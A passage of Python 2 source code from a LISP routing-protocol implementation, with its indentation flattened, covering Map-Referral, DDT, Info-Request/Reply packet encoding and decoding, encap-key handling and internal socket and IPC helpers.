rle_node = lisp_rle_node()
rle.rle_nodes.append(rle_node)
rle_node.level = level
rle_node.address.afi = afi
rle_node.address.mask_len = rle_node.address.host_mask_len()
packet = rle_node.address.unpack_address(packet[6::])
lcaf_len -= rle_node.address.addr_length() + 6
if (lcaf_len >= 2):
afi = struct.unpack("H", packet[:2])[0]
if (socket.ntohs(afi) == LISP_AFI_NAME):
packet = packet[2::]
packet, rle_node.rloc_name = \
lisp_decode_dist_name(packet)
if (packet == None): return(None)
lcaf_len -= len(rle_node.rloc_name) + 1 + 2
#endif
#endif
#endwhile
self.rle = rle
self.rle.build_forwarding_list()
elif (lcaf_type == LISP_LCAF_SECURITY_TYPE):
#
# Get lisp_key() data structure so we can parse keys in the Map-
# Reply RLOC-record. Then get the RLOC address.
#
orig_packet = packet
decode_key = lisp_keys(1)
packet = decode_key.decode_lcaf(orig_packet, lcaf_len, False)
if (packet == None): return(None)
#
# Other side may not do ECDH.
#
cs_list = [LISP_CS_25519_CBC, LISP_CS_25519_CHACHA]
if (decode_key.cipher_suite in cs_list):
if (decode_key.cipher_suite == LISP_CS_25519_CBC):
key = lisp_keys(1, do_poly=False, do_chacha=False)
#endif
if (decode_key.cipher_suite == LISP_CS_25519_CHACHA):
key = lisp_keys(1, do_poly=True, do_chacha=True)
#endif
else:
key = lisp_keys(1, do_poly=False, do_chacha=False)
#endif
packet = key.decode_lcaf(orig_packet, lcaf_len, False)
if (packet == None): return(None)
if (len(packet) < 2): return(None)
afi = struct.unpack("H", packet[:2])[0]
self.rloc.afi = socket.ntohs(afi)
if (len(packet) < self.rloc.addr_length()): return(None)
packet = self.rloc.unpack_address(packet[2::])
if (packet == None): return(None)
self.rloc.mask_len = self.rloc.host_mask_len()
#
# Some RLOC records may not have RLOC addresses but other LCAF
# types. Don't process security keys because we need RLOC addresses
# to index into security data structures.
#
if (self.rloc.is_null()): return(packet)
rloc_name_str = self.rloc_name
if (rloc_name_str): rloc_name_str = blue(self.rloc_name, False)
#
# If we found no stored key, store the newly created lisp_keys()
# to the RLOC list if and only if a remote public-key was supplied
# in the Map-Reply.
#
stored_key = self.keys[1] if self.keys else None
if (stored_key == None):
if (key.remote_public_key == None):
string = bold("No remote encap-public-key supplied", False)
lprint(" {} for {}".format(string, rloc_name_str))
key = None
else:
string = bold("New encap-keying with new state", False)
lprint(" {} for {}".format(string, rloc_name_str))
key.compute_shared_key("encap")
#endif
#endif
#
# If we have stored-key, the other side received the local public
# key that is stored in variable 'stored_key'. If the remote side
# did not supply a public-key, it doesn't want to do lisp-crypto.
# If it did supply a public key, check to see if the same as
# last time, and if so, do nothing, else we do a rekeying.
#
if (stored_key):
if (key.remote_public_key == None):
key = None
remote = bold("Remote encap-unkeying occurred", False)
lprint(" {} for {}".format(remote, rloc_name_str))
elif (stored_key.compare_keys(key)):
key = stored_key
lprint(" Maintain stored encap-keys for {}".format( \
rloc_name_str))
else:
if (stored_key.remote_public_key == None):
string = "New encap-keying for existing state"
else:
string = "Remote encap-rekeying"
#endif
lprint(" {} for {}".format(bold(string, False),
rloc_name_str))
stored_key.remote_public_key = key.remote_public_key
stored_key.compute_shared_key("encap")
key = stored_key
#endif
#endif
self.keys = [None, key, None, None]
else:
#
# All other LCAFs we skip over and ignore.
#
packet = packet[lcaf_len::]
#endif
return(packet)
#enddef
def decode(self, packet, nonce, ms_json_encrypt=False):
packet_format = "BBBBHH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
self.priority, self.weight, self.mpriority, self.mweight, flags, \
afi = struct.unpack(packet_format, packet[:format_size])
flags = socket.ntohs(flags)
afi = socket.ntohs(afi)
self.local_bit = True if (flags & 0x0004) else False
self.probe_bit = True if (flags & 0x0002) else False
self.reach_bit = True if (flags & 0x0001) else False
if (afi == LISP_AFI_LCAF):
packet = packet[format_size-2::]
packet = self.decode_lcaf(packet, nonce, ms_json_encrypt)
else:
self.rloc.afi = afi
packet = packet[format_size::]
packet = self.rloc.unpack_address(packet)
#endif
self.rloc.mask_len = self.rloc.host_mask_len()
return(packet)
#enddef
def end_of_rlocs(self, packet, rloc_count):
for i in range(rloc_count):
packet = self.decode(packet, None, False)
if (packet == None): return(None)
#endfor
return(packet)
#enddef
#endclass
#
# Map-Referral Message Format
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=6 | Reserved | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Record TTL |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# R | Referral Count| EID mask-len | ACT |A|I| Reserved |
# e +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# c |SigCnt | Map Version Number | EID-AFI |
# o +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# r | EID-prefix ... |
# d +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | /| Priority | Weight | M Priority | M Weight |
# | L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | o | Unused Flags |R| Loc/LCAF-AFI |
# | c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | \| Locator ... |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_map_referral():
def __init__(self):
self.record_count = 0
self.nonce = 0
#enddef
def print_map_referral(self):
lprint("{} -> record-count: {}, nonce: 0x{}".format( \
bold("Map-Referral", False), self.record_count,
lisp_hex_string(self.nonce)))
#enddef
def encode(self):
first_long = (LISP_MAP_REFERRAL << 28) | self.record_count
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("Q", self.nonce)
return(packet)
#enddef
def decode(self, packet):
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = socket.ntohl(first_long[0])
self.record_count = first_long & 0xff
packet = packet[format_size::]
packet_format = "Q"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
self.nonce = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
return(packet)
#enddef
#endclass
#
# This is a DDT cache type data structure that holds information configured
# in the "lisp ddt-authoritative-prefix" and "lisp delegate" commands. The
# self.delegatione_set[] is a list of lisp_ddt_node()s.
#
class lisp_ddt_entry():
def __init__(self):
self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.uptime = lisp_get_timestamp()
self.delegation_set = []
self.source_cache = None
self.map_referrals_sent = 0
#enddef
def is_auth_prefix(self):
if (len(self.delegation_set) != 0): return(False)
if (self.is_star_g()): return(False)
return(True)
#enddef
def is_ms_peer_entry(self):
if (len(self.delegation_set) == 0): return(False)
return(self.delegation_set[0].is_ms_peer())
#enddef
def print_referral_type(self):
if (len(self.delegation_set) == 0): return("unknown")
ddt_node = self.delegation_set[0]
return(ddt_node.print_node_type())
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
def add_cache(self):
if (self.group.is_null()):
lisp_ddt_cache.add_cache(self.eid, self)
else:
ddt = lisp_ddt_cache.lookup_cache(self.group, True)
if (ddt == None):
ddt = lisp_ddt_entry()
ddt.eid.copy_address(self.group)
ddt.group.copy_address(self.group)
lisp_ddt_cache.add_cache(self.group, ddt)
#endif
if (self.eid.is_null()): self.eid.make_default_route(ddt.group)
ddt.add_source_entry(self)
#endif
#enddef
def add_source_entry(self, source_ddt):
if (self.source_cache == None): self.source_cache = lisp_cache()
self.source_cache.add_cache(source_ddt.eid, source_ddt)
#enddef
def lookup_source_cache(self, source, exact):
if (self.source_cache == None): return(None)
return(self.source_cache.lookup_cache(source, exact))
#enddef
def is_star_g(self):
if (self.group.is_null()): return(False)
return(self.eid.is_exact_match(self.group))
#enddef
#endclass
class lisp_ddt_node():
def __init__(self):
self.delegate_address = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.public_key = ""
self.map_server_peer = False
self.map_server_child = False
self.priority = 0
self.weight = 0
#enddef
def print_node_type(self):
if (self.is_ddt_child()): return("ddt-child")
if (self.is_ms_child()): return("map-server-child")
if (self.is_ms_peer()): return("map-server-peer")
#enddef
def is_ddt_child(self):
if (self.map_server_child): return(False)
if (self.map_server_peer): return(False)
return(True)
#enddef
def is_ms_child(self):
return(self.map_server_child)
#enddef
def is_ms_peer(self):
return(self.map_server_peer)
#enddef
#endclass
#
# This is a Map-Request queue used on a Map-Resolver when waiting for a
# Map-Referral to be retunred by a DDT-node or a Map-Server.
#
class lisp_ddt_map_request():
def __init__(self, lisp_sockets, packet, eid, group, nonce):
self.uptime = lisp_get_timestamp()
self.lisp_sockets = lisp_sockets
self.packet = packet
self.eid = eid
self.group = group
self.nonce = nonce
self.mr_source = None
self.sport = 0
self.itr = None
self.retry_count = 0
self.send_count = 0
self.retransmit_timer = None
self.last_request_sent_to = None
self.from_pitr = False
self.tried_root = False
self.last_cached_prefix = [None, None]
#enddef
def print_ddt_map_request(self):
lprint("Queued Map-Request from {}ITR {}->{}, nonce 0x{}".format( \
"P" if self.from_pitr else "",
red(self.itr.print_address(), False),
green(self.eid.print_address(), False), self.nonce))
#enddef
def queue_map_request(self):
self.retransmit_timer = threading.Timer(LISP_DDT_MAP_REQUEST_INTERVAL,
lisp_retransmit_ddt_map_request, [self])
self.retransmit_timer.start()
lisp_ddt_map_requestQ[str(self.nonce)] = self
#enddef
def dequeue_map_request(self):
self.retransmit_timer.cancel()
if (lisp_ddt_map_requestQ.has_key(str(self.nonce))):
lisp_ddt_map_requestQ.pop(str(self.nonce))
#endif
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
#endclass
#
# -------------------------------------------------------------------
# Type (Action field) Incomplete Referral-set TTL values
# -------------------------------------------------------------------
# 0 NODE-REFERRAL NO YES 1440
#
# 1 MS-REFERRAL NO YES 1440
#
# 2 MS-ACK * * 1440
#
# 3 MS-NOT-REGISTERED * * 1
#
# 4 DELEGATION-HOLE NO NO 15
#
# 5 NOT-AUTHORITATIVE YES NO 0
# -------------------------------------------------------------------
#
LISP_DDT_ACTION_SITE_NOT_FOUND = -2
LISP_DDT_ACTION_NULL = -1
LISP_DDT_ACTION_NODE_REFERRAL = 0
LISP_DDT_ACTION_MS_REFERRAL = 1
LISP_DDT_ACTION_MS_ACK = 2
LISP_DDT_ACTION_MS_NOT_REG = 3
LISP_DDT_ACTION_DELEGATION_HOLE = 4
LISP_DDT_ACTION_NOT_AUTH = 5
LISP_DDT_ACTION_MAX = LISP_DDT_ACTION_NOT_AUTH
lisp_map_referral_action_string = [
"node-referral", "ms-referral", "ms-ack", "ms-not-registered",
"delegation-hole", "not-authoritative"]
#
# Info-Request/Reply
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=7 |R| Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key ID | Authentication Data Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# ~ Authentication Data ~
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | TTL |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Reserved | EID mask-len | EID-prefix-AFI |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | EID-prefix |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Info-Request specific information following the EID-prefix with
# EID-prefix-AFI set to 0. EID appened below follows with hostname
# or AFI=0:
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 17 | <hostname--null-terminated> |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 0 | <Nothing Follows AFI=0> |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Info-Reply specific information following the EID-prefix:
#
# +->+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | AFI = 16387 | Rsvd1 | Flags |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Type = 7 | Rsvd2 | 4 + n |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# N | MS UDP Port Number | ETR UDP Port Number |
# A +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# T | AFI = x | Global ETR RLOC Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# L | AFI = x | MS RLOC Address ... |
# C +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# A | AFI = x | Private ETR RLOC Address ... |
# F +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | AFI = x | RTR RLOC Address 1 ... |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | AFI = x | RTR RLOC Address n ... |
# +->+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# This encoding will not use authentication so we respond to anyone who
# sends an Info-Request. And the EID-prefix will have AFI=0.
#
class lisp_info():
def __init__(self):
self.info_reply = False
self.nonce = 0
self.private_etr_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.global_etr_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.global_ms_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.ms_port = 0
self.etr_port = 0
self.rtr_list = []
self.hostname = lisp_hostname
#enddef
def print_info(self):
if (self.info_reply):
req_or_reply = "Info-Reply"
rloc = (", ms-port: {}, etr-port: {}, global-rloc: {}, " + \
"ms-rloc: {}, private-rloc: {}, RTR-list: ").format( \
self.ms_port, self.etr_port,
red(self.global_etr_rloc.print_address_no_iid(), False),
red(self.global_ms_rloc.print_address_no_iid(), False),
red(self.private_etr_rloc.print_address_no_iid(), False))
if (len(self.rtr_list) == 0): rloc += "empty, "
for rtr in self.rtr_list:
rloc += red(rtr.print_address_no_iid(), False) + ", "
#endfor
rloc = rloc[0:-2]
else:
req_or_reply = "Info-Request"
hostname = "<none>" if self.hostname == None else self.hostname
rloc = ", hostname: {}".format(blue(hostname, False))
#endif
lprint("{} -> nonce: 0x{}{}".format(bold(req_or_reply, False),
lisp_hex_string(self.nonce), rloc))
#enddef
def encode(self):
first_long = (LISP_NAT_INFO << 28)
if (self.info_reply): first_long |= (1 << 27)
#
# Encode first-long, nonce, key-id longword, TTL and EID mask-len/
# EID-prefix AFI. There is no auth data field since auth len is 0.
# Zero out key-id, auth-data-len, ttl, reserved, eid-mask-len, and
# eid-prefix-afi.
#
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("Q", self.nonce)
packet += struct.pack("III", 0, 0, 0)
#
# Add hostname null terminated string with AFI 17.
#
if (self.info_reply == False):
if (self.hostname == None):
packet += struct.pack("H", 0)
else:
packet += struct.pack("H", socket.htons(LISP_AFI_NAME))
packet += self.hostname + "\0"
#endif
return(packet)
#endif
#
# If Info-Reply, encode Type 7 LCAF.
#
afi = socket.htons(LISP_AFI_LCAF)
lcaf_type = LISP_LCAF_NAT_TYPE
lcaf_len = socket.htons(16)
ms_port = socket.htons(self.ms_port)
etr_port = socket.htons(self.etr_port)
packet += struct.pack("HHBBHHHH", afi, 0, lcaf_type, 0, lcaf_len,
ms_port, etr_port, socket.htons(self.global_etr_rloc.afi))
packet += self.global_etr_rloc.pack_address()
packet += struct.pack("HH", 0, socket.htons(self.private_etr_rloc.afi))
packet += self.private_etr_rloc.pack_address()
if (len(self.rtr_list) == 0): packet += struct.pack("H", 0)
#
# Encode RTR list.
#
for rtr in self.rtr_list:
packet += struct.pack("H", socket.htons(rtr.afi))
packet += rtr.pack_address()
#endfor
return(packet)
#enddef
def decode(self, packet):
orig_packet = packet
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = first_long[0]
packet = packet[format_size::]
packet_format = "Q"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
nonce = struct.unpack(packet_format, packet[:format_size])
first_long = socket.ntohl(first_long)
self.nonce = nonce[0]
self.info_reply = first_long & 0x08000000
self.hostname = None
packet = packet[format_size::]
#
# Parse key-id, auth-len, auth-data, and EID-record. We don't support
# any of these. On encode, we set 3 longs worth of 0.
#
packet_format = "HH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
#
# If an LCAF value appears in the key-id field, then this is an
# old style Echo-Reply (that NX-OS implemented).
#
key_id, auth_len = struct.unpack(packet_format, packet[:format_size])
if (auth_len != 0): return(None)
packet = packet[format_size::]
packet_format = "IBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
ttl, rsvd, ml, eid_afi = struct.unpack(packet_format,
packet[:format_size])
if (eid_afi != 0): return(None)
packet = packet[format_size::]
#
# Check if name supplied.
#
if (self.info_reply == False):
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (len(packet) >= format_size):
afi = struct.unpack(packet_format, packet[:format_size])[0]
if (socket.ntohs(afi) == LISP_AFI_NAME):
packet = packet[format_size::]
packet, self.hostname = lisp_decode_dist_name(packet)
#endif
#endif
return(orig_packet)
#endif
#
# Process Info-Reply.
#
packet_format = "HHBBHHH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
afi, x, lcaf_type, rsvd, lcaf_len, ms_port, etr_port = \
struct.unpack(packet_format, packet[:format_size])
if (socket.ntohs(afi) != LISP_AFI_LCAF): return(None)
self.ms_port = socket.ntohs(ms_port)
self.etr_port = socket.ntohs(etr_port)
packet = packet[format_size::]
#
# Get addresses one AFI at a time.
#
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
#
# Get global ETR RLOC address.
#
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (afi != 0):
self.global_etr_rloc.afi = socket.ntohs(afi)
packet = self.global_etr_rloc.unpack_address(packet)
if (packet == None): return(None)
self.global_etr_rloc.mask_len = \
self.global_etr_rloc.host_mask_len()
#endif
#
# Get global MS RLOC address.
#
if (len(packet) < format_size): return(orig_packet)
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (afi != 0):
self.global_ms_rloc.afi = socket.ntohs(afi)
packet = self.global_ms_rloc.unpack_address(packet)
if (packet == None): return(orig_packet)
self.global_ms_rloc.mask_len = self.global_ms_rloc.host_mask_len()
#endif
#
# Get private ETR RLOC address.
#
if (len(packet) < format_size): return(orig_packet)
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (afi != 0):
self.private_etr_rloc.afi = socket.ntohs(afi)
packet = self.private_etr_rloc.unpack_address(packet)
if (packet == None): return(orig_packet)
self.private_etr_rloc.mask_len = \
self.private_etr_rloc.host_mask_len()
#endif
#
# Get RTR list if any.
#
while (len(packet) >= format_size):
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (afi == 0): continue
rtr = lisp_address(socket.ntohs(afi), "", 0, 0)
packet = rtr.unpack_address(packet)
if (packet == None): return(orig_packet)
rtr.mask_len = rtr.host_mask_len()
self.rtr_list.append(rtr)
#endwhile
return(orig_packet)
#enddef
#endclass
class lisp_nat_info():
def __init__(self, addr_str, hostname, port):
self.address = addr_str
self.hostname = hostname
self.port = port
self.uptime = lisp_get_timestamp()
#enddef
def timed_out(self):
elapsed = time.time() - self.uptime
return(elapsed >= (LISP_INFO_INTERVAL * 2))
#enddef
#endclass
class lisp_info_source():
def __init__(self, hostname, addr_str, port):
self.address = lisp_address(LISP_AFI_IPV4, addr_str, 32, 0)
self.port = port
self.uptime = lisp_get_timestamp()
self.nonce = None
self.hostname = hostname
self.no_timeout = False
#enddef
def cache_address_for_info_source(self):
key = self.address.print_address_no_iid() + self.hostname
lisp_info_sources_by_address[key] = self
#enddef
def cache_nonce_for_info_source(self, nonce):
self.nonce = nonce
lisp_info_sources_by_nonce[nonce] = self
#enddef
#endclass
#------------------------------------------------------------------------------
#
# lisp_concat_auth_data
#
# Take each longword and convert to binascii by byte-swapping and zero filling
# longword that leads with 0.
#
def lisp_concat_auth_data(alg_id, auth1, auth2, auth3, auth4):
if (lisp_is_x86()):
if (auth1 != ""): auth1 = byte_swap_64(auth1)
if (auth2 != ""): auth2 = byte_swap_64(auth2)
if (auth3 != ""):
if (alg_id == LISP_SHA_1_96_ALG_ID): auth3 = socket.ntohl(auth3)
else: auth3 = byte_swap_64(auth3)
#endif
if (auth4 != ""): auth4 = byte_swap_64(auth4)
#endif
if (alg_id == LISP_SHA_1_96_ALG_ID):
auth1 = lisp_hex_string(auth1)
auth1 = auth1.zfill(16)
auth2 = lisp_hex_string(auth2)
auth2 = auth2.zfill(16)
auth3 = lisp_hex_string(auth3)
auth3 = auth3.zfill(8)
auth_data = auth1 + auth2 + auth3
#endif
if (alg_id == LISP_SHA_256_128_ALG_ID):
auth1 = lisp_hex_string(auth1)
auth1 = auth1.zfill(16)
auth2 = lisp_hex_string(auth2)
auth2 = auth2.zfill(16)
auth3 = lisp_hex_string(auth3)
auth3 = auth3.zfill(16)
auth4 = lisp_hex_string(auth4)
auth4 = auth4.zfill(16)
auth_data = auth1 + auth2 + auth3 + auth4
#endif
return(auth_data)
#enddef
#
# lisp_open_listen_socket
#
# Open either internal socket or network socket. If network socket, it will
# open it with a local address of 0::0 which means the one socket can be
# used for IPv4 or IPv6. This is goodness and reduces the number of threads
# required.
#
def lisp_open_listen_socket(local_addr, port):
if (port.isdigit()):
if (local_addr.find(".") != -1):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
#endif
if (local_addr.find(":") != -1):
if (lisp_is_raspbian()): return(None)
sock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
#endif
sock.bind((local_addr, int(port)))
else:
name = port
if (os.path.exists(name)):
os.system("rm " + name)
time.sleep(1)
#endif
sock = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
sock.bind(name)
#endif
return(sock)
#enddef
#
# lisp_open_send_socket
#
# Open socket for sending to port 4342.
#
def lisp_open_send_socket(internal_name, afi):
if (internal_name == ""):
if (afi == LISP_AFI_IPV4):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
#endif
if (afi == LISP_AFI_IPV6):
if (lisp_is_raspbian()): return(None)
sock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
#endif
else:
if (os.path.exists(internal_name)): os.system("rm " + internal_name)
sock = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
sock.bind(internal_name)
#endif
return(sock)
#enddef
#
# lisp_close_socket
#
# Close network and internal sockets.
#
def lisp_close_socket(sock, internal_name):
sock.close()
if (os.path.exists(internal_name)): os.system("rm " + internal_name)
return
#endif
#
# lisp_is_running
#
# Test if one of "lisp-itr", "lisp-etr", "lisp-mr", "lisp-ms", "lisp-ddt", or
# "lisp-core" is running.
#
def lisp_is_running(node):
return(True if (os.path.exists(node)) else False)
#enddef
#
# lisp_packet_ipc
#
# Build IPC message for a LISP control packet destined for UDP port 4342. This
# packet goes to the lisp-core process and then it IPCs it to the appropriate
# LISP component process.
#
def lisp_packet_ipc(packet, source, sport):
return(("packet@" + str(len(packet)) + "@" + source + "@" + str(sport) + \
"@" + packet))
#enddef
#
# lisp_control_packet_ipc
#
# Build IPC message for a packet that needs to be source from UDP port 4342.
# Always sent by a LISP component process to the lisp-core process.
#
def lisp_control_packet_ipc(packet, source, dest, dport):
return("control-packet@" + dest + "@" + str(dport) + "@" + packet)
#enddef
#
# lisp_data_packet_ipc
#
# Build IPC message for a MAC, IPv4, or IPv6 data packet.
#
def lisp_data_packet_ipc(packet, source):
return("data-packet@" + str(len(packet)) + "@" + source + "@@" + packet)
#enddef
#
# lisp_command_ipc
#
# Build IPC message for a command message. Note this command IPC message must
# have same number of parameters as the "packet@" IPC. So an intentional
# double @ is put in after the source to indicate a null port.
#
def lisp_command_ipc(packet, source):
return("command@" + str(len(packet)) + "@" + source + "@@" + packet)
#enddef
#
# lisp_api_ipc
#
# Build IPC message for a command message. Note this command IPC message must
# have same number of parameters as the "packet@" IPC. So an intentional
# double @ is put in after the source to indicate a null port.
#
def lisp_api_ipc(source, data):
return("api@" + str(len(data)) + "@" + source + "@@" + data)
#enddef
#
# lisp_ipc
#
# Send IPC message to internal AF_UNIX socket if LISP component is running. We
# need to send in 15000 byte segments since the socket interface will not allow
# to support more. And socket.setsockopt() won't alow to increase SO_SNDBUF.
#
def lisp_ipc(packet, send_socket, node):
#
# Can't send an IPC message to a process that is not running.
#
if (lisp_is_running(node) == False):
lprint("Suppress sending IPC to {}".format(node))
return
#endif
ipc_len = 1500 if (packet.find("control-packet") == -1) else 9000
offset = 0
length = len(packet)
retry_count = 0
sleep_time = .001
while (length > 0):
segment_len = min(length, ipc_len)
segment = packet[offset:segment_len+offset]
try:
send_socket.sendto(segment, node)
lprint("Send IPC {}-out-of-{} byte to {} succeeded".format( \
len(segment), len(packet), node))
retry_count = 0
sleep_time = .001
except socket.error, e:
if (retry_count == 12):
lprint("Giving up on {}, consider it down".format(node))
break
#endif
lprint("Send IPC {}-out-of-{} byte to {} failed: {}".format( \
len(segment), len(packet), node, e))
retry_count += 1
time.sleep(sleep_time)
lprint("Retrying after {} ms ...".format(sleep_time * 1000))
sleep_time *= 2
continue
#endtry
offset += segment_len
length -= segment_len
#endwhile
return
#enddef
#
# lisp_format_packet
#
# Put a whitespace between every 4 bytes of a packet dump.
#
def lisp_format_packet(packet):
packet = binascii.hexlify(packet)
offset = 0
new = ""
length = len(packet) * 2
while (offset < length):
new += packet[offset:offset+8] + " "
offset += 8
length -= 4
#endfor
return(new)
#enddef
#
# lisp_send
#
# Send packet out.
#
def lisp_send(lisp_sockets, dest, port, packet):
lisp_socket = lisp_sockets[0] if dest.is_ipv4() else lisp_sockets[1]
#
# Remove square brackets. Use an IPv4 socket when address is IPv4, even
# when embedded in ::ffff:<ipv4-address>. This is a special case when
# an RTR sits behind a NAT and is sending a Map-Request. The ECM and
# Map-Request need to use the same ephemeral port and the Map-Reply
# needs to come to the ephemeral listening socket lisp_sockets[0];
#
# Also, on getchip and raspberry-pi OSes, there is no support for IPv6
# sockets, so we need to use the IPv4 embedded address and the IPv4
# socket.
#
address = dest.print_address_no_iid()
if (address.find("::ffff:") != -1 and address.count(".") == 3):
if (lisp_i_am_rtr): lisp_socket = lisp_sockets[0]
if (lisp_socket == None):
lisp_socket = lisp_sockets[0]
address = address.split("::ffff:")[-1]
#endif
#endif
lprint("{} {} bytes {} {}, packet: {}".format(bold("Send", False),
len(packet), bold("to " + address, False), port,
lisp_format_packet(packet)))
#
# If Map-Request/Reply RLOC-probe set TTL for outgoing packet to 255.
#
set_ttl = (LISP_RLOC_PROBE_TTL == 128)
if (set_ttl):
lisp_type = struct.unpack("B", packet[0])[0]
set_ttl = (lisp_type in [0x12, 0x28])
